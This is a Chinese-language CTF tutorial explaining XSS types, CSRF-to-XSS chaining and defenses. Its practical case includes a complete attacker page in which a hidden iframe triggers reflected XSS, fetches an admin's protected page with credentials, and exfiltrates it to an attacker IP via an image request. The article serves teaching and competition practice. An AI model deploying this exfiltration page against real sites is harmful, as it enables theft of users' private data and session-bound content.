CTF 中的 XSS 攻击：原理、技巧与实战案例

跨站脚本攻击（Cross-Site Scripting，简称 XSS）是一种常见的 Web 漏洞，利用该漏洞，攻击者可以在受害者浏览器中注入并执行恶意脚本。在 CTF（Capture The Flag）竞赛中，XSS 攻击不仅是一种考察 Web 安全基础的攻击技术，同时也是非常实用的进阶手段，可以用来窃取敏感信息、绕过访问控制或结合 CSRF（跨站请求伪造）实现更复杂的链式攻击。

本文将介绍 XSS 攻击的基本原理、常见类型、如何在 CTF 中利用 XSS 攻击，以及防御措施。

---

一、XSS 攻击基本原理

1. 什么是 XSS？

XSS 攻击指的是攻击者通过在 Web 页面中注入恶意 JavaScript 代码，使得这些代码在其他用户的浏览器中执行。通过这种方式，攻击者可以篡改页面内容、窃取用户 Cookie、劫持用户会话，甚至对用户进行钓鱼攻击。

2. XSS 的类型

• 反射型 XSS（Reflected XSS）：
  攻击者将恶意脚本嵌入到请求中，目标服务器将其反射到响应中。例如，通过 URL 参数传入恶意代码，目标页面在渲染时执行了该代码。
• 存储型 XSS（Stored XSS）：
  恶意代码被永久存储在服务器上（例如数据库、留言板），当其他用户访问包含该内容的页面时，恶意代码被执行。
• DOM 型 XSS：
  恶意代码完全在客户端执行，通过修改页面的 DOM 结构，攻击者利用 JavaScript 动态修改页面内容，从而引发 XSS 漏洞。

---

二、CTF 中的 XSS 攻击

在 CTF 中，XSS 攻击通常不是为了破坏 Web 应用，而是为了获得 flag。CTF 赛题往往会设置一些特定的场景，例如存储型 XSS、反射型 XSS 或利用 CSRF 触发 XSS 链，以考察参赛者对 Web 漏洞利用链的理解和实践能力。

1. 反射型 XSS 示例

在反射型 XSS 题目中，用户提交的输入（例如 URL 参数、表单数据）被直接反射到页面中。如果输入没有经过充分过滤，攻击者可以构造如下 URL：

http://example.com/search?query=<script>alert('XSS')</script>

当其他用户点击该链接时，浏览器就会执行 alert('XSS')。在 CTF 中，这种简单的 payload 常用于证明漏洞存在。

2. 存储型 XSS 示例

存储型 XSS 攻击中，攻击者提交的数据被存储在服务器上。当其他用户（例如管理员或特定用户）访问含有该数据的页面时，恶意代码会被执行。例如，攻击者在论坛留言中提交：

<script>alert('PWNED');</script>

当管理员查看留言时，浏览器执行这段代码，攻击者可以利用此漏洞进一步窃取管理员信息或执行其他操作。

3. CSRF 与 XSS 的结合

CTF 题目中，有时会将 CSRF 与 XSS 攻击结合起来，形成攻击链。例如：

• 利用 CSRF 诱使管理员访问一个恶意页面（由攻击者控制）。
• 恶意页面通过反射型 XSS 载荷，让管理员的浏览器执行 JavaScript 代码。
• 利用 JavaScript 内部的 fetch() 请求获取管理员专属的页面内容（例如包含 flag 的页面）。
• 最终将页面内容通过 exfiltration（数据外泄）的方式发送到攻击者服务器。

这种 CSRF→XSS 链可以绕过 HttpOnly cookie 限制，因为一旦脚本在管理员浏览器中执行，它就能读取同源下的所有页面内容。

---

三、实战案例

下面是一段示例代码，展示如何利用 CSRF-to-XSS 链来获取 flag。假设目标应用使用 Flask 开发，管理员的 flag 隐藏在一个草稿帖子中，只有在发布后才能完整显示，而管理员默认不会发布草稿。

攻击思路如下：

1. 利用 CSRF 让管理员的浏览器访问一个恶意页面（由攻击者托管）。
2. 恶意页面反射 XSS 负载，利用 fetch() 请求目标页面（例如首页 /），读取包含 flag 的 HTML 内容。
3. 利用 new Image().src 将获取到的数据以 GET 请求形式 exfiltrate 到攻击者服务器。

示例恶意页面代码：

<!DOCTYPE html>
<html>
<head><meta charset="UTF-8"><title>CSRF to XSS Attack: Publish Admin Draft</title>
</head>
<body><h1>Triggering CSRF-to-XSS Attack</h1><script>// Construct the XSS payload.// Dynamically construct the closing tag to avoid breaking the script.var payload = `<scr` + `ipt>// Use fetch() to retrieve the protected page (which now shows the full flag).fetch("http://challenge.localhost/", { credentials: "include" }).then(response => response.text()).then(data => {// Exfiltrate the data to the attacker's server.var exfilUrl = "http://10.17.108.216:8888/?flag=" + encodeURIComponent(data);new Image().src = exfilUrl;}).catch(error => console.error("Fetch error:", error));</scr` + `ipt>`;// URL-encode the payload.var encodedPayload = encodeURIComponent(payload);// Build the target URL using the /ephemeral endpoint, which reflects the msg parameter.var targetUrl = "http://challenge.localhost/ephemeral?msg=" + encodedPayload;// Create a hidden iframe to force admin's browser to load the target URL and execute the payload.var iframe = document.createElement("iframe");iframe.style.display = "none";iframe.src = targetUrl;document.body.appendChild(iframe);</script>
</body>
</html>

说明：

• 将 http://10.17.108.216:8888/ 替换为你攻击机的实际 IP 和监听端口。
• 当管理员（通过 victim 工具登录 admin）访问这个页面时，iframe 会加载 http://challenge.localhost/ephemeral?msg=...，反射出 XSS 负载。
• 执行后，fetch() 请求会获取到包含 flag 的页面内容，并通过 Image 对象将数据发送到攻击者服务器。

---

四、防御措施

• 输入过滤与输出编码：
  对所有用户输入进行严格过滤，并在输出时进行适当编码，防止 HTML/JS 注入。

• Content Security Policy (CSP)：
  实施 CSP 可有效限制内嵌脚本的执行，降低 XSS 攻击风险。

• CSRF Token：
  对敏感操作采用 CSRF token 机制，确保请求来自可信任的页面。

• HttpOnly Cookies：
  虽然 HttpOnly 可防止 JavaScript 直接访问 Cookie，但不能防止通过 XSS 进行间接的攻击（如 fetch() 读取页面内容）。

---

结论

XSS 攻击在 CTF 中非常常见，其形式多样，从简单的弹出框到复杂的 CSRF-to-XSS 链式攻击。通过学习和实践这些技巧，不仅可以提高你在 CTF 中的实战能力，也能加深对 Web 安全原理的理解。希望这篇博客能帮助你了解 XSS 攻击的各种方法及防御措施，并在 CTF 比赛中取得好成绩！

Happy hacking!